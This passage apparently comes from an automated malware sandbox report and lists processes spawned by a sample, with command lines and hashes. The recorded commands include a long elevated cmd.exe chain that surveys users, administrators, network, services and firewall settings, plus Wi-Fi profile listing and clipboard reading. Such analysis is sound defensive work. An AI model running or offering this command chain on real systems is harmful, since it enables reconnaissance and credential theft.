                                                                                                                                                                                                                                                          Commandline:cmd.exe /c chcp
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:28
                                                                                                                                                                                                                                                          Start time:20:53:03
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:chcp
                                                                                                                                                                                                                                                          Imagebase:0x7ff7e5100000
                                                                                                                                                                                                                                                          File size:14'848 bytes
                                                                                                                                                                                                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:29
                                                                                                                                                                                                                                                          Start time:20:53:03
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:cmd.exe /c chcp
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:30
                                                                                                                                                                                                                                                          Start time:20:53:03
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                          Imagebase:0x7ff786440000
                                                                                                                                                                                                                                                          File size:106'496 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:31
                                                                                                                                                                                                                                                          Start time:20:53:04
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:powershell.exe Get-Clipboard
                                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:32
                                                                                                                                                                                                                                                          Start time:20:53:04
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:chcp
                                                                                                                                                                                                                                                          Imagebase:0x7ff7e5100000
                                                                                                                                                                                                                                                          File size:14'848 bytes
                                                                                                                                                                                                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:33
                                                                                                                                                                                                                                                          Start time:20:53:04
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:34
                                                                                                                                                                                                                                                          Start time:20:53:04
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:35
                                                                                                                                                                                                                                                          Start time:20:53:04
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:36
                                                                                                                                                                                                                                                          Start time:20:53:04
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:37
                                                                                                                                                                                                                                                          Start time:20:53:04
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:systeminfo
                                                                                                                                                                                                                                                          Imagebase:0x7ff6d6950000
                                                                                                                                                                                                                                                          File size:110'080 bytes
                                                                                                                                                                                                                                                          MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:38
                                                                                                                                                                                                                                                          Start time:20:53:04
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:netsh wlan show profiles
                                                                                                                                                                                                                                                          Imagebase:0x7ff633c30000
                                                                                                                                                                                                                                                          File size:96'768 bytes
                                                                                                                                                                                                                                                          MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:39
                                                                                                                                                                                                                                                          Start time:20:53:04
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                          Imagebase:0x7ff693ab0000
                                                                                                                                                                                                                                                          File size:496'640 bytes
                                                                                                                                                                                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:40
                                                                                                                                                                                                                                                          Start time:20:53:05
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\HOSTNAME.EXE
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:hostname
                                                                                                                                                                                                                                                          Imagebase:0x7ff688410000
                                                                                                                                                                                                                                                          File size:14'848 bytes
                                                                                                                                                                                                                                                          MD5 hash:33AFAA43B84BDEAB12E02F9DBD2B2EE0
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:41
                                                                                                                                                                                                                                                          Start time:20:53:06
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:wmic logicaldisk get caption,description,providername
                                                                                                                                                                                                                                                          Imagebase:0x7ff70bb60000
                                                                                                                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:42
                                                                                                                                                                                                                                                          Start time:20:53:06
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                          Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                                          File size:55'320 bytes
                                                                                                                                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:43
                                                                                                                                                                                                                                                          Start time:20:53:07
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:net user
                                                                                                                                                                                                                                                          Imagebase:0x7ff6f83b0000
                                                                                                                                                                                                                                                          File size:59'904 bytes
                                                                                                                                                                                                                                                          MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:44
                                                                                                                                                                                                                                                          Start time:20:53:07
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\net1 user
                                                                                                                                                                                                                                                          Imagebase:0x7ff66aa70000
                                                                                                                                                                                                                                                          File size:183'808 bytes
                                                                                                                                                                                                                                                          MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:45
                                                                                                                                                                                                                                                          Start time:20:53:07
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\query.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:query user
                                                                                                                                                                                                                                                          Imagebase:0x7ff61a530000
                                                                                                                                                                                                                                                          File size:17'408 bytes
                                                                                                                                                                                                                                                          MD5 hash:29043BC0B0F99EAFF36CAD35CBEE8D45
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:46
                                                                                                                                                                                                                                                          Start time:20:53:07
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\quser.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\quser.exe"
                                                                                                                                                                                                                                                          Imagebase:0x7ff7a6ca0000
                                                                                                                                                                                                                                                          File size:25'600 bytes
                                                                                                                                                                                                                                                          MD5 hash:480868AEBA9C04CA04D641D5ED29937B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:47
                                                                                                                                                                                                                                                          Start time:20:53:07
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:net localgroup
                                                                                                                                                                                                                                                          Imagebase:0x7ff6f83b0000
                                                                                                                                                                                                                                                          File size:59'904 bytes
                                                                                                                                                                                                                                                          MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:48
                                                                                                                                                                                                                                                          Start time:20:53:08
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\net1 localgroup
                                                                                                                                                                                                                                                          Imagebase:0x7ff66aa70000
                                                                                                                                                                                                                                                          File size:183'808 bytes
                                                                                                                                                                                                                                                          MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:49
                                                                                                                                                                                                                                                          Start time:20:53:08
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:net localgroup administrators
                                                                                                                                                                                                                                                          Imagebase:0x7ff6f83b0000
                                                                                                                                                                                                                                                          File size:59'904 bytes
                                                                                                                                                                                                                                                          MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:50
                                                                                                                                                                                                                                                          Start time:20:53:08
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\net1 localgroup administrators
                                                                                                                                                                                                                                                          Imagebase:0x7ff66aa70000
                                                                                                                                                                                                                                                          File size:183'808 bytes
                                                                                                                                                                                                                                                          MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:51
                                                                                                                                                                                                                                                          Start time:20:53:08
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:net user guest
                                                                                                                                                                                                                                                          Imagebase:0x7ff6f83b0000
                                                                                                                                                                                                                                                          File size:59'904 bytes
                                                                                                                                                                                                                                                          MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:52
                                                                                                                                                                                                                                                          Start time:20:53:08
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\net1 user guest
                                                                                                                                                                                                                                                          Imagebase:0x7ff66aa70000
                                                                                                                                                                                                                                                          File size:183'808 bytes
                                                                                                                                                                                                                                                          MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:53
                                                                                                                                                                                                                                                          Start time:20:53:09
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:net user administrator
                                                                                                                                                                                                                                                          Imagebase:0x7ff6f83b0000
                                                                                                                                                                                                                                                          File size:59'904 bytes
                                                                                                                                                                                                                                                          MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:54
                                                                                                                                                                                                                                                          Start time:20:53:09
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\net1 user administrator
                                                                                                                                                                                                                                                          Imagebase:0x7ff66aa70000
                                                                                                                                                                                                                                                          File size:183'808 bytes
                                                                                                                                                                                                                                                          MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:55
                                                                                                                                                                                                                                                          Start time:20:53:09
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:wmic startup get caption,command
                                                                                                                                                                                                                                                          Imagebase:0x7ff70bb60000
                                                                                                                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:56
                                                                                                                                                                                                                                                          Start time:20:53:09
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:tasklist /svc
                                                                                                                                                                                                                                                          Imagebase:0x7ff786440000
                                                                                                                                                                                                                                                          File size:106'496 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:57
                                                                                                                                                                                                                                                          Start time:20:53:10
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\ipconfig.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:ipconfig /all
                                                                                                                                                                                                                                                          Imagebase:0x7ff670f20000
                                                                                                                                                                                                                                                          File size:35'840 bytes
                                                                                                                                                                                                                                                          MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:58
                                                                                                                                                                                                                                                          Start time:20:53:10
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\ROUTE.EXE
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:route print
                                                                                                                                                                                                                                                          Imagebase:0x7ff691b20000
                                                                                                                                                                                                                                                          File size:24'576 bytes
                                                                                                                                                                                                                                                          MD5 hash:3C97E63423E527BA8381E81CBA00B8CD
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:59
                                                                                                                                                                                                                                                          Start time:20:53:10
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\ARP.EXE
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:arp -a
                                                                                                                                                                                                                                                          Imagebase:0x7ff6619b0000
                                                                                                                                                                                                                                                          File size:26'624 bytes
                                                                                                                                                                                                                                                          MD5 hash:2AF1B2C042B83437A4BE82B19749FA98
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:60
                                                                                                                                                                                                                                                          Start time:20:53:10
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\NETSTAT.EXE
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:netstat -ano
                                                                                                                                                                                                                                                          Imagebase:0x7ff719ff0000
                                                                                                                                                                                                                                                          File size:39'936 bytes
                                                                                                                                                                                                                                                          MD5 hash:7FDDD6681EA81CE26E64452336F479E6
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:61
                                                                                                                                                                                                                                                          Start time:20:53:10
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:sc query type= service state= all
                                                                                                                                                                                                                                                          Imagebase:0x7ff77f1a0000
                                                                                                                                                                                                                                                          File size:72'192 bytes
                                                                                                                                                                                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:62
                                                                                                                                                                                                                                                          Start time:20:53:10
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:netsh firewall show state
                                                                                                                                                                                                                                                          Imagebase:0x7ff633c30000
                                                                                                                                                                                                                                                          File size:96'768 bytes
                                                                                                                                                                                                                                                          MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

